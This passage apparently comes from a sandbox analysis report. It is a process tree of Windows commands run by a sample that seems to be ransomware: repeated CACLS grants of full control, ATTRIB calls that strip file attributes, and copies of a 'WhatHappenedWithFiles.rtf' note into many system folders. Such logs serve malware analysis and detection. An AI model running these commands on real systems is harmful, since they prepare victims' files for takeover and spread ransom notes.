        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\OFFICE\UICAPT~1\3082\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2892
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp"
        5⤵
        
        PID:1544
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp" /E /G Admin:F /C
        6⤵
        
        PID:832
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1496
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\USERAC~1\DEFAUL~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:284
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp"
        5⤵
        
        PID:1272
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2080
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2684
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp"
        5⤵
        
        PID:2100
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2968
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:740
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp"
        5⤵
        
        PID:2552
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2440
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2384
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp"
        5⤵
        
        PID:2752
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp" /E /G Admin:F /C
        6⤵
        
        PID:696
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2576
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp"
        5⤵
        
        PID:2832
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2480
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp"
        5⤵
        
        PID:1260
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1752
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1028
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp"
        5⤵
        
        PID:1056
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp" /E /G Admin:F /C
        6⤵
        
        PID:964
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2136
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp"
        5⤵
        
        PID:2800
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2484
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:784
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp"
        5⤵
        
        PID:1708
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2716
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2216
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp"
        5⤵
        
        PID:2292
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2204
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1768
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp"
        5⤵
        
        PID:1600
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2572
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2648
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp"
        5⤵
        
        PID:2544
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp" /E /G Admin:F /C
        6⤵
        
        PID:432
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1464
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp"
        5⤵
        
        PID:2616
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1988
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:396
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp"
        5⤵
        
        PID:1480
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp" /E /G Admin:F /C
        6⤵
        
        PID:3008
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2268
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp"
        5⤵
        
        PID:1148
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2364
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2496
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp"
        5⤵
        
        PID:2008
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2236
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp"
        5⤵
        
        PID:2612
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp" /E /G Admin:F /C
        6⤵
        
        PID:528
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp"
        5⤵
        
        PID:2820
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1284
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1804
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp"
        5⤵
        
        PID:1980
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp" /E /G Admin:F /C
        6⤵
        
        PID:3028
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1648
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp"
        5⤵
        
        PID:1732
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1956
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2992
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp"
        5⤵
        
        PID:292
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1688
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1952
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp"
        5⤵
        
        PID:1292
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2284
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1100
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp"
        5⤵
        
        PID:2960
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1596
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:832
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp"
        5⤵
        
        PID:1496
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2756
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1720
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp"
        5⤵
        
        PID:1868
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2080
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1932
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp"
        5⤵
        
        PID:1272
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2968
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:740
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp"
        5⤵
        
        PID:2192
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1572
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2776
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp"
        5⤵
        
        PID:3012
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1632
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:696
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp"
        5⤵
        
        PID:2348
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2972
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2864
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp"
        5⤵
        
        PID:2480
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2200
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp"
        5⤵
        
        PID:2012
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2556
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2088
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp"
        5⤵
        
        PID:1244
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2500
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2016
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp"
        5⤵
        
        PID:588
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2472
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2908
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp"
        5⤵
        
        PID:2632
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1852
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2596
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\USERAC~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~2\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2216
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck"
        5⤵
        
        PID:2904
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck" /E /G Admin:F /C
        6⤵
        
        PID:1164
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck"
        6⤵
        Views/modifies file attributes
        
        PID:2572
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MOZILL~1\updates\308046~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:396
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{33D1F~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2764
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{4D8DC~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
